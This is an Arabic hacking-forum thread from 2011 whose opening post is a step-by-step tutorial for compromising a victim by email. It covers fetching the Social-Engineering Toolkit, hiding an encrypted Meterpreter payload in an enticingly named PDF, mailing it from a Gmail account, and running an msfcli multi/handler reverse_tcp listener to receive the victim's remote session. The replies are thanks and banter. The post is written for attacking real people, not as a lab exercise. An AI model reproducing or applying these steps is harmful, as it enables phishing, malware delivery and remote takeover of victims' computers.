التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Penteration Testing Training

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-07-2011, 07:37 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية KHOFACH
 

 

 
إحصائية العضو






KHOFACH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
KHOFACH is on a distinguished road

................ الباك تراك 4 => الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!


بسم الله الرحمن الرحيم ..



اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

=============KHOFACH - paltalk======= =====

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية


ماهي الادوات اللازمة للقيام بالعملية ؟


1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
ملاحظة : يجب ان تكون root ..


الان ندخل على مجلد الاداة بالامر :

كود:
cd SET
من ثم نشغل الادة عن طريق الامر :

كود:
./set
و هذي صورة توضيحية للامرين ..


اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :



مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم




الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter




الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..



الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..



بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..


الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟




.. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :

كود:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E

الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !



تم بحمد الله ...

ملاحظة هامة :الشرح المصور ده منقول تم نقلو لكي يتم التدقيق في الاوامر وتم عمل شرح فديو مني لكي نطبق عملي ولكن عمليت الاختراق لن تكتمل لانه تم شرح العملية في الصور وكانت اداة SET قديمة فتم عمل شرح فديو على الجديدة.

تحميل الشرح الفديو :http://arabsh.com/paq2whht53g2.html

KHOFACH - backtrack+meta+exploit = NO One Can Stop ME



hgfh; jvh; 4 => hghojvhr fhgik]sm hgh[jlhudm ad gh dw]ri urg *_*>>>!!!! hghojvhr fhgik]sm

   

رد مع اقتباس
قديم 07-07-2011, 07:40 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


الباك تراك من اذكى انضمة التشغيل
تسلم يا بطل

   

رد مع اقتباس
قديم 07-07-2011, 07:40 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


اقتباس
KHOFACH - backtrack+meta+exploit = NO One Can Stop ME

تابع يا غالي
بالتوفيق

   

رد مع اقتباس
قديم 07-07-2011, 07:41 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية KHOFACH
 

 

 
إحصائية العضو






KHOFACH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
KHOFACH is on a distinguished road

افتراضي


merci

   

رد مع اقتباس
قديم 09-10-2011, 01:06 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية flooper
 

 

 
إحصائية العضو






flooper غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
flooper is on a distinguished road

افتراضي رد: الباك تراك 4 => الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!


nice

   

رد مع اقتباس
قديم 09-11-2011, 06:55 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو





سجين الوطن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
سجين الوطن is on a distinguished road

افتراضي رد: الباك تراك 4 => الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!


يعطيك العافية

   

رد مع اقتباس
قديم 01-06-2012, 01:42 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: الباك تراك 4 => الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!


الباك تراك من اذكى انضمة التشغيل
لا كن عندي والله هوا ضعيف
في اكثر حولي 6 انضمه افضل من الباك تراك
وهي هاذ الانضمه سريه لي الغيه
والسلام عليكم

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
قديم 01-06-2012, 01:43 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية محمد50
 

 

 
إحصائية العضو






محمد50 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
محمد50 is on a distinguished road

افتراضي رد: الباك تراك 4 => الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!


على عموم شكرن يا الغالي

التوقيع

اقتباس
نئسف لقد تم اعتزال من عالمات الهاكات + تراكات + لينكاسات
1اقدم رساله لي كل محبين لي انا لقد تم العتزل من علم الهكر + الكراكر + لينكس + ..........!!!
2 نشكر على التقيم لي انا بي كل المشركات
3 شكر على كل من اقام بي راد على الموضوعي انا
4 وعلى في بعض نلس ما يحبون انا لكن انا اقول لهم انا احبكم لان ههه بي نهتيه نحن اخوان بي الئسلام واقول لهم اسف ان انا قد تم من انا كللمه مش حلوه اسف اتسف
كان معكم ((( محمد50))))+قوقل هكرز+ميكرسوفت حمايه+ميكرسوفت هكرز+لينكس هكر بااااااااااااااااااااااااي

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
الاختراق بالهندسة


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:23 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0